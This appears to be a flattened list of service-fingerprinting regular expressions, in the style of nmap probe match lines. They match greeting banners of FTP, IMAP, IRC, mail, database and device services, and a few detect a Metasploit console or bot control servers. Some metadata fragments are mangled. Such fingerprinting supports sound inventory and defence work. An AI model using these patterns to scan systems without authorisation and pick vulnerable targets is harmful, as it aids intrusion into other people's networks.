+/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] 